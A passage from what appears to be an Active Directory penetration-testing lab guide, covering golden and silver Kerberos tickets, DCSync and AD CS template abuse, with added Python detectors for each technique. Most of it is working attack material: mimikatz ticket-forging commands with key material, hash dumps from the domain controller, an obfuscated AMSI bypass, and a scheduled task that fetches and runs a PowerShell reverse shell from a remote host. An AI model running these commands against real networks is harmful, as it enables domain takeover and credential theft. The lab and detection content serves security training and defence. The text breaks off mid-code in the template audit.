PCRFHMJKey: 5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5
- aes256_hmac
Lifetime : 1/14/2021 7:30:53 AM ; 1/14/2021 5:30:53 PM ; 1/21/2021 7:30:53 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'Administrator @ us.techcorp.local' successfully submitted for current session

Let's check the ticket:

C:\Windows\system32>klist

Current LogonId is 0:0x42694a1

Cached Tickets: (1)



#0> Client: Administrator @ us.techcorp.local
Server: krbtgt/us.techcorp.local @ us.techcorp.local
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 1/14/2021 7:32:36 (local)
End Time: 1/14/2021 17:32:36 (local)
Renew Time: 1/21/2021 7:32:36 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

With the Golden ticket injected in the current session, we should be able to access any resource in the domain as administrator (DA):

C:\Windows\system32>winrs -r:us-dc cmd
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Administrator>whoami
whoami
us\administrator

Sweet!

Now, to extract all the secrets in the domain from the domain controller, we can use the below commands. Run them from the command prompt where we injected the Golden ticket:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Loader.exe \\us-dc\C$\Users\Public\Loader.exe /Y
[snip]

C:\Windows\system32>winrs -r:us-dc cmd
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Administrator>netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=192.168.100.x
C:\Users\Administrator>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe
[snip]
hostname - Displays system local hostname

mimikatz # lsadump::lsa /patch
Domain : US / S-1-5-21-210670787-2521448726-163245708

RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 43b70d2d979805f419e02882997f8f3f



RID : 000001f5 (501)
User : Guest
LM :
NTLM :

RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : b0975ae49f441adc6b024ad238935af5

[snip]
mimikatz #

Using Invoke-Mimi.ps1 and PowerShell Remoting

We can also use Invoke-Mimi from a normal PowerShell session:

PS C:\AD\Tools> . C:\AD\Tools\Invoke-Mimi.ps1
PS C:\AD\Tools> Invoke-Mimi -Command '"kerberos::golden /User:Administrator
/domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708
/aes256:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5
/startoffset:0 /endin:600 /renewmax:10080 /ptt"'

.#####. mimikatz 2.2.0 (x64) #18362 May 30 2019 09:58:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::golden /User:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708 /aes256:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5 /startoffset:0 /endin:600 /renewmax:10080 /ptt
User : Administrator
Domain : us.techcorp.local (US)
SID : S-1-5-21-210670787-2521448726-163245708
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5
- aes256_hmac
Lifetime : 1/14/2021 7:34:42 AM ; 1/14/2021 5:34:42 PM ; 1/21/2021 7:34:42 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated



Golden ticket for 'Administrator @ us.techcorp.local' successfully submitted
for current session

Access the DC using PowerShell Remoting:

PS C:\AD\Tools> Enter-PSSession -ComputerName us-dc
[us-dc]: PS C:\Users\Administrator\Documents> whoami
us\administrator

We can extract all the secrets from the DC. Run the below commands from the PowerShell session where you injected the Golden ticket:

PS C:\AD\Tools> $sess = New-PSSession us-dc.us.techcorp.local
PS C:\AD\Tools> Enter-PSSession -Session $sess
[us-dc.us.techcorp.local]: PS C:\Users\Administrator\Documents> S`eT-It`em (
'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-
F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL
)."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${n`ULl},${t`RuE} )
[us-dc.us.techcorp.local]: PS C:\Users\Administrator\Documents> exit
PS C:\AD\Tools> Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session
$sess
PS C:\AD\Tools> Enter-PSSession -Session $sess
[us-dc.us.techcorp.local]: PS C:\Users\Administrator\Documents> Invoke-Mimi -
Command '"lsadump::lsa /patch"'
[snip]



Hands-On 15:
Task
• During the additional lab time, try to get command execution on the domain controller by
creating silver ticket for:
− HOST service
− WMI

Solution
From the information gathered in previous steps we have the credentials (AES key) of the machine account of the domain controller (us-dc$). Using the below command from an elevated shell, we can create a Silver ticket that gives us access to the HOST service of the DC:

C:\Windows\system32>C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/User:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-
2521448726-163245708 /target:us-dc.us.techcorp.local /service:HOST
/aes256:36e55da5048fa45492fc7af6cb08dbbc8ac22d91c697e2b6b9b8c67b9ad1e0bb
/startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
[snip]
User : Administrator
Domain : us.techcorp.local (US)
SID : S-1-5-21-210670787-2521448726-163245708
User Id : 500
Groups Id : *513 512 520 518 519
XEZUHLNKey: 36e55da5048fa45492fc7af6cb08dbbc8ac22d91c697e2b6b9b8c67b9ad1e0bb
- aes256_hmac
XEZUHLN : HOST
Target : us-dc.us.techcorp.local
Lifetime : 1/14/2021 9:03:58 AM ; 1/14/2021 7:03:58 PM ; 1/21/2021 9:03:58 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'Administrator @ us.techcorp.local' successfully submitted for current session

M8H3EZ5C(commandline) # exit
Bye!



Let's check the ticket:

C:\Windows\system32>klist

Current LogonId is 0:0x42694a1

Cached Tickets: (1)

#0> Client: Administrator @ us.techcorp.local
Server: HOST/us-dc.us.techcorp.local @ us.techcorp.local
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 1/14/2021 9:03:58 (local)
End Time: 1/14/2021 19:03:58 (local)
Renew Time: 1/21/2021 9:03:58 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

A TGS for the HOST service on us-dc allows us to schedule tasks there.
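Both forged tickets in Hands-On 14 and 15 leave a correlation gap in the Kerberos audit trail, and that gap is the detection. A Golden ticket is a forged TGT: the KDC never issued it, so the service ticket requests (event 4769) made with it have no earlier TGT issuance (event 4768) for the same account and client address. A Silver ticket is a forged service ticket: it never touches the KDC, so the target host records a Kerberos network logon (event 4624) for which no domain controller has a matching 4769. mimikatz also writes the realm exactly as typed on its command line, which is why the klist output above reads 'Administrator @ us.techcorp.local' where a KDC-issued ticket shows 'US.TECHCORP.LOCAL'. The following detector is an added example, not part of the course material; all events and ticket entries are constructed, with field names following the Windows security event schema.

```python
"""Correlate Kerberos audit events to surface forged (Golden / Silver) tickets.

Added example, not the course's code. Events are constructed; field names
follow the Windows security event schema (4768, 4769, 4624).
"""


def tgs_without_tgt(dc_events):
    """Return 4769 events whose account/client pair never obtained a TGT
    (successful 4768, Status 0x0) earlier in the same event stream."""
    tgt_seen = set()
    suspects = []
    for ev in sorted(dc_events, key=lambda e: e["time"]):
        if ev["EventID"] == 4768 and ev.get("Status") == "0x0":
            tgt_seen.add((ev["TargetUserName"].lower(), ev["IpAddress"]))
        elif ev["EventID"] == 4769:
            account = ev["TargetUserName"].split("@")[0].lower()
            if (account, ev["IpAddress"]) not in tgt_seen:
                suspects.append(ev)
    return suspects


def logons_without_tgs(dc_events, host_events):
    """Return Kerberos network logons (4624, LogonType 3) on a host for which
    no 4769 names that host's machine account as the service."""
    tgs_seen = {
        (ev["TargetUserName"].split("@")[0].lower(), ev["ServiceName"].lower())
        for ev in dc_events if ev["EventID"] == 4769
    }
    suspects = []
    for ev in host_events:
        if ev["EventID"] != 4624 or ev["LogonType"] != 3:
            continue
        if ev["AuthenticationPackageName"] != "Kerberos":
            continue
        key = (ev["TargetUserName"].lower(), ev["Host"].lower() + "$")
        if key not in tgs_seen:
            suspects.append(ev)
    return suspects


def realm_case_anomalies(tickets):
    """Return cached tickets whose realm is not upper case (KDC-issued
    tickets carry the realm in upper case; forged ones carry it as typed)."""
    return [t for t in tickets if t["realm"] != t["realm"].upper()]


# Constructed DC events: a normal TGT+TGS for studentuserx, then a TGS request
# for Administrator that was never preceded by a TGT (Golden ticket in use).
DC_EVENTS = [
    {"EventID": 4768, "time": 1, "TargetUserName": "studentuserx",
     "IpAddress": "192.168.100.11", "Status": "0x0"},
    {"EventID": 4769, "time": 2, "TargetUserName": "studentuserx@US.TECHCORP.LOCAL",
     "ServiceName": "US-DC$", "IpAddress": "192.168.100.11"},
    {"EventID": 4769, "time": 3, "TargetUserName": "Administrator@US.TECHCORP.LOCAL",
     "ServiceName": "US-WEB$", "IpAddress": "192.168.100.11"},
]

# Constructed logons on us-dc: studentuserx is backed by a 4769 above;
# Administrator is not (a Silver ticket for HOST/us-dc presented directly).
HOST_EVENTS = [
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "studentuserx", "Host": "us-dc"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "Administrator", "Host": "us-dc"},
]

# Constructed klist-style entries: the second mirrors the forged ticket above.
TICKETS = [
    {"client": "administrator", "realm": "US.TECHCORP.LOCAL"},
    {"client": "Administrator", "realm": "us.techcorp.local"},
]

if __name__ == "__main__":
    for ev in tgs_without_tgt(DC_EVENTS):
        print(f"[golden?] TGS for {ev['TargetUserName']} from {ev['IpAddress']} with no TGT")
    for ev in logons_without_tgs(DC_EVENTS, HOST_EVENTS):
        print(f"[silver?] logon of {ev['TargetUserName']} on {ev['Host']} with no TGS")
    for t in realm_case_anomalies(TICKETS):
        print(f"[realm  ] {t['client']} @ {t['realm']}")
```

Two caveats when running this over real logs: the 4768 for a legitimate TGT may predate the collection window (TGTs live 10 hours by default), so the Golden check needs at least that much history, and the Silver check needs 4769 from every DC in the domain, since the client may have asked any of them.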

Start a listener in another command prompt session:

C:\Users\studentuserx>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\Users\studentuserx> . C:\AD\Tools\powercat.ps1
PS C:\Users\studentuserx> powercat -l -v -p 443 -t 1000
VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Console
VERBOSE: Setting up Stream 1...
VERBOSE: Listening on [0.0.0.0] (port 443)

Schedule and run a task that starts a reverse shell on us-dc. Make sure the Invoke-PowerShellTcp script ends with the function call. Run the below commands from the command prompt where the TGS for HOST is injected:

C:\Windows\system32>schtasks /create /S us-dc.us.techcorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "Userx" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.100.x/Invoke-PowerShellTcpEx.ps1''')'"
SUCCESS: The scheduled task "Userx" has successfully been created.
C:\Windows\system32>schtasks /Run /S us-dc.us.techcorp.local /TN "Userx"
SUCCESS: Attempted to run the scheduled task "Userx".



On the listener:

PS C:\AD\Tools> powercat -l -v -p 443 -t 1000
VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Console
VERBOSE: Setting up Stream 1...
VERBOSE: Listening on [0.0.0.0] (port 443)
VERBOSE: Connection from [192.168.2.1] port [tcp] accepted (source port 63871)
VERBOSE: Setting up Stream 2...
VERBOSE: Both Communication Streams Established. Redirecting Data Between Streams...

Windows PowerShell running as user US-DC$ on US-DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
us-dc

For accessing WMI, we need to create two tickets, one for the HOST service and another for RPCSS:

C:\Windows\system32>C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/User:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-
2521448726-163245708 /target:us-dc.us.techcorp.local /service:HOST
/aes256:36e55da5048fa45492fc7af6cb08dbbc8ac22d91c697e2b6b9b8c67b9ad1e0bb
/startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
[snip]

C:\Windows\system32>C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/User:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-
2521448726-163245708 /target:us-dc.us.techcorp.local /service:RPCSS
/aes256:36e55da5048fa45492fc7af6cb08dbbc8ac22d91c697e2b6b9b8c67b9ad1e0bb
/startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
[snip]

C:\Windows\system32>Get-WmiObject -Class win32_operatingsystem -ComputerName us-dc.us.techcorp.local

SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 17763
RegisteredUser : Windows User
SerialNumber : 00429-90000-00001-AA056
Version : 10.0.17763



Hands-On 16:
Task
• Later during the extra lab time:
− Check if studentuserx has Replication (DCSync) rights.
− If yes, execute the DCSync attack to pull hashes of the krbtgt user.
− If no, add the replication rights for the studentuserx and execute the DCSync attack to pull
hashes of the krbtgt user.

Solution
We can check whether studentuserx has replication rights using the following PowerView command. Run it from InvisiShell:

C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\AD\Tools>. C:\AD\Tools\PowerView.ps1
PS C:\AD\Tools> Get-DomainObjectAcl -SearchBase "dc=us,dc=techcorp,dc=local"
-SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-
get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object
{$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName
$_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "studentuserx"}

We get no output, so studentuserx does not have replication rights. But we can add those rights with Domain Administrator privileges! Using Overpass-the-hash, let's run a command prompt with DA privileges:

C:\Windows\System32>C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth
/user:administrator /domain:us.techcorp.local
/aes256:db7bd8e34fada016eb0e292816040a1bf4eeb25cd3843e041d0278d30dc1b335
/run:cmd.exe" "exit"
[snip]

In the new process, use either PowerView:

PS C:\Windows\system32> Add-DomainObjectAcl -TargetIdentity "dc=us,dc=techcorp,dc=local" -PrincipalIdentity studentuserx -Rights DCSync -PrincipalDomain us.techcorp.local -TargetDomain us.techcorp.local -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://US-
DC.US.TECHCORP.LOCAL/DC=us,DC=techcorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(&(|(|(samAccountName=studentuserx)(name=studentuserx)(displayname=studentuse
rx))))
VERBOSE: [Get-DomainSearcher] search base: LDAP://US-
DC.US.TECHCORP.LOCAL/DC=us,DC=techcorp,DC=local



VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(&(|(distinguishedname=dc=us,dc=techcorp,dc=local)))
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=studentuserx,CN=Users,DC=us,DC=techcorp,DC=local 'DCSync' on
DC=us,DC=techcorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=studentuserx,CN=Users,DC=us,DC=techcorp,DC=local rights GUID
'1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' on DC=us,DC=techcorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=studentuserx,CN=Users,DC=us,DC=techcorp,DC=local rights GUID
'1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' on DC=us,DC=techcorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=studentuserx,CN=Users,DC=us,DC=techcorp,DC=local rights GUID
'89e95b76-444d-4c62-991a-0facbeda640c' on DC=us,DC=techcorp,DC=local

or

Use the Active Directory module with Set-ADACL from RACE as Domain Admin:

PS C:\AD\Tools> Set-ADACL -DistinguishedName 'DC=us,DC=techcorp,DC=local' -SamAccountName studentuserx -GUIDRight DCSync -Verbose
VERBOSE: Getting the existing ACL for DC=us,DC=techcorp,DC=local.
VERBOSE: Setting ACL for "DC=us,DC=techcorp,DC=local" for "studentuserx" to
use "DCSync" right.

Let's check for the rights once again from a normal shell:

PS C:\Windows\system32> Get-DomainObjectAcl -SearchBase "dc=us,dc=techcorp,dc=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "studentuserX"}

AceQualifier : AccessAllowed
ObjectDN : DC=us,DC=techcorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-In-Filtered-Set
ObjectSID : S-1-5-21-210670787-2521448726-163245708
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-210670787-2521448726-163245708-1223
AccessMask : 256
AuditFlags : None



IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : US\studentuserX
[snip]

Sweet! Now the below commands can be used as studentuserx to get the hashes of the krbtgt user:

C:\AD\Tools>C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"

or

PS C:\AD\Tools> Invoke-Mimi -Command '"lsadump::dcsync /user:us\krbtgt"'
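The defensive counterpart to this hands-on has two halves: auditing who holds the replication control-access rights on the domain head (the three GUIDs Add-DomainObjectAcl granted above), and detecting their use. Password hashes can only be pulled when a principal holds both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All; the filtered-set right alone is not enough. On the domain controller each replication request is audited as event 4662 with the right's GUID in the Properties field, so a 4662 carrying those GUIDs from an account that is not a domain controller is DCSync in progress. The code below is an added example, not part of the course material; the ACE records and 4662 events are constructed, and svc-adconnect is a hypothetical directory-sync account.

```python
"""Audit DCSync capability on the domain head and detect its use via 4662.

Added example, not the course's code. ACEs and events are constructed;
svc-adconnect is a hypothetical directory-synchronisation account.
"""

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Both of these are needed before lsadump::dcsync returns password data.
SECRETS_RIGHTS = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}

# Principals that hold replication rights on the domain head by default
# (assumption: extend with the sync accounts used in your environment).
EXPECTED = {"Domain Controllers", "Enterprise Domain Controllers",
            "Domain Admins", "Enterprise Admins", "Administrators", "SYSTEM"}


def dcsync_capable(aces):
    """Map each unexpected identity to the replication rights it holds on the
    domain head; GenericAll implies all of them. Accepts resolved names
    (PowerView -ResolveGUIDs) or raw GUIDs in ObjectAceType."""
    holders = {}
    for ace in aces:
        if ace["AceQualifier"] != "AccessAllowed":
            continue
        right = ace.get("ObjectAceType", "")
        right = REPLICATION_RIGHTS.get(right.lower(), right)
        rights = set()
        if right in REPLICATION_RIGHTS.values():
            rights.add(right)
        if "GenericAll" in ace["ActiveDirectoryRights"]:
            rights.update(REPLICATION_RIGHTS.values())
        name = ace["IdentityName"].split("\\")[-1]
        if rights and name not in EXPECTED:
            holders.setdefault(name, set()).update(rights)
    return holders


def can_dump_secrets(holders):
    """Identities whose rights suffice to replicate password data."""
    return sorted(n for n, r in holders.items() if SECRETS_RIGHTS <= r)


def dcsync_events(events, approved=frozenset()):
    """Return (account, rights used) for 4662 events that exercise a
    replication right from an account that is neither a machine account
    (name ending in $, as DCs replicating with each other) nor approved."""
    alerts = []
    for ev in events:
        if ev["EventID"] != 4662:
            continue
        props = ev["Properties"].lower()
        used = [n for g, n in REPLICATION_RIGHTS.items() if g in props]
        user = ev["SubjectUserName"]
        if used and not user.endswith("$") and user not in approved:
            alerts.append((user, used))
    return alerts


DOMAIN_DN = "DC=us,DC=techcorp,DC=local"

# Constructed ACEs on the domain head after the Add-DomainObjectAcl call above.
SAMPLE_ACES = [
    {"ObjectDN": DOMAIN_DN, "AceQualifier": "AccessAllowed", "ActiveDirectoryRights": "ExtendedRight",
     "ObjectAceType": "DS-Replication-Get-Changes", "IdentityName": "US\\studentuserx"},
    {"ObjectDN": DOMAIN_DN, "AceQualifier": "AccessAllowed", "ActiveDirectoryRights": "ExtendedRight",
     "ObjectAceType": "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2", "IdentityName": "US\\studentuserx"},
    {"ObjectDN": DOMAIN_DN, "AceQualifier": "AccessAllowed", "ActiveDirectoryRights": "ExtendedRight",
     "ObjectAceType": "DS-Replication-Get-Changes", "IdentityName": "US\\svc-adconnect"},
    {"ObjectDN": DOMAIN_DN, "AceQualifier": "AccessAllowed", "ActiveDirectoryRights": "GenericAll",
     "ObjectAceType": "", "IdentityName": "US\\Domain Admins"},
]

# Constructed 4662 events: inter-DC replication, studentuserx pulling secrets,
# and an unrelated 4662 carrying a placeholder (non-replication) GUID.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "US-DC2$",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "studentuserx",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "studentuserx",
     "Properties": "{11111111-2222-3333-4444-555555555555}"},
]

if __name__ == "__main__":
    holders = dcsync_capable(SAMPLE_ACES)
    for name, rights in holders.items():
        print(f"[ACL ] {name}: {', '.join(sorted(rights))}")
    print("[ACL ] can dump secrets:", ", ".join(can_dump_secrets(holders)))
    for user, used in dcsync_events(SAMPLE_EVENTS):
        print(f"[4662] {user} replicated with {', '.join(used)}")
```

The machine-account exclusion in dcsync_events is a coarse baseline; a stricter version compares the subject against the actual list of domain controller accounts, since any computer account name also ends in `$`.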



Hands-On 17:
Task
• Check if AD CS is used by the target forest and find any vulnerable/abusable templates.
• Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin.

Solution
Using the Certify tool, enumerate the Certification Authorities in the target forest:

C:\AD\Tools> C:\AD\Tools\Certify.exe cas

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Find certificate authorities

[*] Using the search base 'CN=Configuration,DC=techcorp,DC=local'

[*] Root CAs

Cert SubjectName : CN=TECHCORP-DC-CA, DC=techcorp, DC=local
Cert Thumbprint : F95C7E9F28F50C87F309A6EFB2CB3AEB0B2FAC86
Cert Serial : 4F3F87A449C15587446B046111AA6313
Cert Start Date : 7/12/2019 12:02:05 AM
Cert End Date : 7/12/2024 12:12:04 AM
Cert Chain : CN=TECHCORP-DC-CA,DC=techcorp,DC=local
[snip]
Certify completed in 00:00:18.9273849

Enumerate templates:

C:\AD\Tools> C:\AD\Tools\Certify.exe find

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Find certificate templates

[snip]
[*] Available Certificates Templates :

CA Name : Techcorp-DC.techcorp.local\TECHCORP-DC-CA
Template Name : User
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN,
SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL,
SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS,
PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting
File System, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : TECHCORP\Domain Admins S-1-5-21-
[snip]

CA Name : Techcorp-DC.techcorp.local\TECHCORP-DC-CA
Template Name : ForAdminsofPrivilegedAccessWorkstations
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS,
PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting
File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting
File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : TECHCORP\Domain Admins S-1-5-21-2781415573-3701854478-2406986946-512
TECHCORP\Enterprise Admins S-1-5-21-2781415573-3701854478-2406986946-519
US\pawadmin S-1-5-21-210670787-2521448726-163245708-1138



Great! pawadmin has enrollment rights on the template ForAdminsofPrivilegedAccessWorkstations, which has the ENROLLEE_SUPPLIES_SUBJECT flag set and allows Client Authentication. This means that, as pawadmin, we can request a certificate with an arbitrary subject alternative name, i.e. for ANY user. We can also enumerate this directly with the following command:
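The conditions that make this template abusable are well defined (the pattern is ESC1 in the SpecterOps "Certified Pre-Owned" classification), so an AD CS review can check them mechanically rather than by eye. A template is only exploitable this way when all of the following hold: ENROLLEE_SUPPLIES_SUBJECT is set, no authorized signature and no CA manager approval (PEND_ALL_REQUESTS) is required, an EKU permits client authentication (or the EKU list is empty, meaning any purpose), and a principal outside the privileged groups holds Enroll. The audit below is an added example, not part of the course material; the first two template records mirror the Certify output above, while the WebServer-style and approval-gated templates are constructed to show the conditions that break the path.

```python
"""Flag certificate templates where a low-privileged enrollee may supply the
subject of a certificate usable for authentication (ESC1).

Added example, not the course's code. The first two templates mirror the
Certify output; the other two are constructed counter-examples.
"""

PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators"}

# EKUs that allow the certificate to be used for domain logon (PKINIT/Schannel).
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
             "Smart Card Logon", "Any Purpose"}


def esc1_findings(templates):
    """Return (template name, low-privileged enrollers) for abusable templates."""
    findings = []
    for t in templates:
        if "ENROLLEE_SUPPLIES_SUBJECT" not in t["msPKI-Certificates-Name-Flag"]:
            continue
        if t["Authorized Signatures Required"] > 0:
            continue  # an enrollment agent must co-sign the request
        if "PEND_ALL_REQUESTS" in t["mspki-enrollment-flag"]:
            continue  # CA manager approval gates issuance
        ekus = set(t["pkiextendedkeyusage"])
        if ekus and not ekus & AUTH_EKUS:
            continue  # certificate cannot be used to authenticate
        enrollers = [p for p in t["Enrollment Rights"]
                     if p.split("\\")[-1] not in PRIVILEGED]
        if enrollers:
            findings.append((t["Template Name"], enrollers))
    return findings


def remediation(template):
    """Suggest the smallest change that removes the path for one template."""
    return (f"{template['Template Name']}: clear ENROLLEE_SUPPLIES_SUBJECT or "
            f"require CA certificate manager approval, and review who holds Enroll.")


CA = "Techcorp-DC.techcorp.local\\TECHCORP-DC-CA"
TEMPLATES = [
    {"CA Name": CA, "Template Name": "User",
     "msPKI-Certificates-Name-Flag": ["SUBJECT_ALT_REQUIRE_UPN", "SUBJECT_ALT_REQUIRE_EMAIL",
                                      "SUBJECT_REQUIRE_EMAIL", "SUBJECT_REQUIRE_DIRECTORY_PATH"],
     "mspki-enrollment-flag": ["INCLUDE_SYMMETRIC_ALGORITHMS", "PUBLISH_TO_DS", "AUTO_ENROLLMENT"],
     "Authorized Signatures Required": 0,
     "pkiextendedkeyusage": ["Client Authentication", "Encrypting File System", "Secure Email"],
     "Enrollment Rights": ["TECHCORP\\Domain Admins"]},
    {"CA Name": CA, "Template Name": "ForAdminsofPrivilegedAccessWorkstations",
     "msPKI-Certificates-Name-Flag": ["ENROLLEE_SUPPLIES_SUBJECT"],
     "mspki-enrollment-flag": ["INCLUDE_SYMMETRIC_ALGORITHMS", "PUBLISH_TO_DS"],
     "Authorized Signatures Required": 0,
     "pkiextendedkeyusage": ["Client Authentication", "Encrypting File System", "Secure Email"],
     "Enrollment Rights": ["TECHCORP\\Domain Admins", "TECHCORP\\Enterprise Admins", "US\\pawadmin"]},
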